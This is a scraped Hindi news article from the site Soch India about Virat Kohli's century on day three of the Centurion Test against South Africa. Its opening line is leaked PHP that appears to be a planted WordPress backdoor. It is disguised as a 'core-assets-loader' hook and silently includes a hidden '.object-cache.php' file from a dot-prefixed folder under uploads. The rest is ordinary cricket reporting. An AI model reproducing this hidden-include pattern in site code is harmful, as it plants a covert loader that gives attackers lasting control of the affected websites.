add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); कप्तान कोहली के नाम पर रहा पहला सेशन, बढ़त लेने के करीब टीम इंडिया – SOCH INDIA
Menu

खेल
कप्तान कोहली के नाम पर रहा पहला सेशन, बढ़त लेने के करीब टीम इंडिया

nobanner

दूसरा टेस्ट, तीसरा दिन, पहला सेशन-

साउथ अफ्रीका के खिलाफ सेंचुरियन में खेले जा रहे दूसरे टेस्ट के तीसरे दिन का पहला सेशन कप्तान विराट कोहली के नाम रहा. कप्तानी पारी खेलते हुए कोहली ने करियर का 21वां शतक लगाया और भारत की उम्मीदों को बचाए रखा है. लंच ब्रेक तक भारत ने 8 विकेट खोकर 287 रन बना लिए हैं. कोहली 141 रन बनाकर खेल रहे हैं. भारत साउथ अफ्रीका के पहली पारी के आधार पर अभी 48 रन पीछे है. कोहली का साथ इशांत शर्मा दे रहे हैं जिन्हें अभी अपना खाता खोलना बाकी है.

21 साल बाद दक्षिण अफ्रीका में किसी भारतीय कप्तान ने जमाया शतक
भारत ने तीसरे दिन की शुरुआत 183 रन पर पांच विकेट से की. भारतीय टीम की पूरी उम्मीद कोहली और हार्दिक पांड्या की जोड़ी पर थी लेकिन पांड्या अपने कल के स्कोर में 4 रन जोड़ने के बाद गैर जिम्मेदाराना खेल का परिचय देते हुए रन आउट हो गए. 209 के कुल योग पर पांड्या के आउट होने के बाद भारत को एक बड़ी साझेदारी की जरूरत थी और आर अश्विन ने कप्तान का बखुबी साथ निभाया. अश्विन ने 38 रन बनाए और सातवें विकेट के लिए 71 रनों की साझेदारी निभाई.
साउथ अफ्रीका को विकेट की तलाश थी और नई गेंद ने उनका काम आसान कर दिया. फिलेंडर की बाहर जाती गेंद को अश्विन खेलने गए और स्लिप में कप्तान फाफ डू प्लेसी ने शानदार कैच लपक कर साझेदारी को तोड़ा. अश्विन की तरह ही अगले ओवर में मोहम्मद शमी भी पवेलियन लौट गए. उन्हें मोर्कल ने पवेलियन भेजा.
गिरते विकेट के बीच कप्तान कोहली दीवार बन कर खड़े हैं और अपनी पारी में अब 14 चौके जमा चुके हैं. दूसरे सेशन में टीम बचे दो विकेट के साथ मेजबान टीम पर बढ़त लेने की कोशिश करेगी.